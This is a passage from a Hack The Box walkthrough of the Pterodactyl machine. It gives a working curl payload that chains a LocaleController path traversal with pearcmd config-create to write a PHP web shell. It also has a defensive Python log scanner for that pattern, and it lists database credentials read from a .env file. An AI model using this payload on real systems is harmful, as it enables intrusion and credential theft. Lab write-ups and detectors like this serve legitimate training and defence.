In this walkthrough, we’ll explore the full exploitation path of the Pterodactyl machine on Hack The Box. This journey takes us from an unauthenticated RCE in a popular game management panel to a sophisticated privilege escalation chain involving PAM environment manipulation and a race condition in udisks2.
Our entry point was the Pterodactyl Panel, a widely used open-source game server management platform. During reconnaissance, we identified a Local File Inclusion (LFI) vulnerability in the LocaleController. The application failed to sanitize the locale parameter before using it in a file operation, allowing for directory traversal.
The target system had the PEAR (PHP Extension and Application Repository) package installed. By traversing to /usr/share/php/PEAR, we could include pearcmd.php. This tool is powerful because it processes command-line arguments passed via the PHP $_SERVER['argv'] array, which can be manipulated through the URL.
We targeted the PEAR config-create command. This command takes two primary arguments: a "root directory" and a destination path for the configuration file. By injecting a PHP system shell into the first argument and specifying a file in the web root as the second, we effectively "installed" a web shell.
The Exploit Payload:
curl "http://panel.pterodactyl.htb/locales/locale.json?locale=../../../../../../../../usr/share/php/PEAR&namespace=pearcmd&command=config-create&/<?=@system(\$_GET['cmd']);?>&/var/www/pterodactyl/public/shell.php"
This granted us execution as the wwwrun user.
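From the defender's side, the request pattern behind this chain is easy to spot in web-server access logs. The following Python script is an added example, not part of the original writeup: it parses constructed Apache-style log lines (the client IPs, timestamps and paths are made up) and flags the two markers of the chain, a traversal in the locale parameter and pearcmd/config-create arguments riding in the query string.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not from the original writeup): the first
# two mirror the traversal-plus-pearcmd request pattern, the rest are benign.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:00 +0000] "GET /locales/locale.json?locale=../../../../usr/share/php/PEAR&namespace=pearcmd&command=config-create HTTP/1.1" 200 512
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /locales/locale.json?locale=%2e%2e%2f%2e%2e%2fusr%2fshare%2fphp%2fPEAR&namespace=pearcmd HTTP/1.1" 200 512
10.10.14.7 - - [01/Jan/2024:10:00:02 +0000] "GET /locales/locale.json?locale=en&namespace=server HTTP/1.1" 200 2048
10.10.14.8 - - [01/Jan/2024:10:00:03 +0000] "GET /api/client HTTP/1.1" 200 128
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
LOCALE_OK = re.compile(r'^[A-Za-z]{2,3}(?:[_-][A-Za-z]{2,4})?$')  # e.g. en, en_US, pt-BR
PEAR_MARKERS = ("pearcmd", "config-create")

def analyse_request(target: str) -> list[str]:
    """Return the reasons a request target looks like LocaleController abuse (empty if clean)."""
    parts = urlsplit(target)
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    if parts.path.startswith("/locales/"):
        for locale in params.get("locale", []):
            decoded = unquote(unquote(locale))  # tolerate single or double URL-encoding
            if ".." in decoded or "/" in decoded or "\\" in decoded:
                reasons.append("traversal in locale parameter")
            elif not LOCALE_OK.match(decoded):
                reasons.append("unexpected locale value")
    decoded_target = unquote(unquote(target)).lower()
    if any(marker in decoded_target for marker in PEAR_MARKERS):
        reasons.append("pearcmd argument injection marker")
    return reasons

def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """Return (client ip, request target, reasons) for every suspicious access-log line."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = analyse_request(m.group("target"))
        if reasons:
            hits.append((m.group("ip"), m.group("target"), reasons))
    return hits

if __name__ == "__main__":
    for ip, target, reasons in scan_log(SAMPLE_LOG):
        print(f"{ip} {target} -> {', '.join(reasons)}")
```

A hardened LocaleController would reject anything the LOCALE_OK pattern rejects before touching the filesystem, which is the same check the detector applies after the fact.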
As wwwrun, we immediately began exfiltrating the Laravel environment. Reading /var/www/pterodactyl/.env revealed the database credentials (database name, username and password):
panel
pterodactyl
PteraPanel